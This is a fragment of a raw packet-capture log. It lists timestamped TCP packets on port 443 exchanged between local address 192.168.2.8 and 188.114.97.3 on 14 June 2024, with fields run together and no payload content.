          Jun 14, 2024 15:15:05.890618086 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.890656948 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.890685081 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.890692949 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.890717983 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.890821934 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.890868902 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.890882015 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.890909910 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.890949011 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891067982 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891108036 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891138077 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891197920 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891247034 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891369104 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891411066 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891437054 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891444921 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891464949 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891572952 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891618013 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891635895 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891649008 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891693115 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891768932 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891808987 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891828060 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.891843081 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.891875982 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.930165052 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.930210114 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.930304050 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.930329084 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.930354118 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.974149942 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.985541105 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.985557079 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.985599041 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.985630035 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.985727072 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.985743999 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.985785007 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987616062 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987638950 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987689972 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987704992 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987709045 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987723112 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987740993 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987773895 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987773895 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987786055 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987809896 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987829924 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987832069 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987848043 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987857103 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987864971 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987881899 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987931013 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.987936974 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.987979889 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988048077 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988066912 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988132954 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988140106 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988157988 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988178968 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988179922 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988192081 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988208055 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988243103 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988313913 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988329887 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988384962 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988387108 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988394976 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988411903 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988445044 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988451958 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988464117 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988497972 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988693953 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988709927 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988773108 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988780022 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988791943 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988809109 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988831997 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988838911 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988867044 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988881111 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988899946 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988914013 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.988969088 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.988976002 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989012957 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.989100933 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989116907 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989166975 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.989172935 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989214897 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.989262104 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989279985 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989337921 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.989345074 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989394903 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.989496946 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989510059 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989559889 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.989567995 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989609957 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.989972115 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.989986897 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990037918 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.990046024 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990087032 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.990266085 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990286112 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990341902 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.990343094 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.990374088 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990394115 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.990430117 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.990571976 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990583897 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990643024 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.990650892 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.990701914 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.991018057 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991034031 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991094112 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.991101980 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991148949 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.991324902 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991339922 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991396904 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.991404057 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991449118 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.991866112 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991878986 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991935015 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.991941929 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.991974115 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992012024 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992290020 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992309093 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992378950 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992386103 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992427111 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992434025 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992440939 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992458105 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992494106 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992527008 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992532015 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992580891 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992636919 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992651939 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992701054 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992707968 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.992741108 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.992768049 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993067980 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993084908 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993135929 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993144035 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993172884 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993201017 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993297100 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993313074 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993367910 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993376017 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993406057 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993427038 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993452072 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993468046 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993527889 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993534088 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993581057 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993676901 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993693113 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993746042 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993753910 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.993778944 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.993803978 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.994409084 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.994425058 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.994498014 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.994524956 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.994538069 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.994574070 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.995541096 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.995556116 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.995620012 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.995626926 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.995671034 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.995695114 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.995709896 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.995754957 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.995763063 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.995809078 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.995829105 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.995945930 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.995960951 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996006012 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996012926 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996041059 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996062040 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996171951 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996186972 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996239901 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996248007 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996273041 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996293068 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996561050 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996576071 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996632099 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996640921 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996689081 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996721983 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996736050 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996788979 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996794939 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.996818066 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.996844053 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.998703957 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.998722076 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.998778105 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.998785019 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.998805046 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.998823881 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.999361038 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.999377012 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.999420881 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.999427080 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.999458075 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.999476910 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000056028 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000071049 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000133991 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000144005 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000181913 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000448942 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000466108 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000519037 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000525951 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000565052 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000725031 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000741005 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000786066 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000792980 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000816107 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000830889 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000839949 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000859022 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000895023 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000901937 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.000927925 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.000937939 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001137972 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001153946 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001204014 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001207113 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001214981 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001240015 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001255989 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001261950 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001288891 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001301050 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001442909 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001456022 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001508951 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001516104 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001553059 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001852036 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001867056 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001910925 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.001919031 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.001955032 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002019882 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002034903 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002082109 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002089977 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002125025 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002149105 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002166033 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002213955 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002222061 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002255917 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002466917 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002480984 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002558947 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002568007 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002600908 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002669096 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002685070 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002728939 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002739906 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002751112 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.002783060 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.002814054 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.003060102 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003074884 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003139973 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.003148079 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003170967 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003189087 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003221989 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.003230095 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003241062 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.003365040 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003381014 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003463984 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.003470898 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003572941 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003592014 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003629923 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.003638983 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.003658056 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.046878099 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.046890974 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.047027111 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.047054052 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.099168062 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.102341890 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.102366924 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.103751898 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.103785992 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.103851080 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.103863955 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.103874922 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.103895903 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.103921890 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.103940964 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104006052 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104012966 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104022980 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104043007 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104089975 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104095936 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104111910 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104126930 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104140043 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104186058 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104192972 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104217052 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104218960 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104285002 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104290962 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104413986 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104429007 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104486942 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:06.104492903 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104504108 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:06.104528904 CEST44349707188.114.97.3192.168.2.8
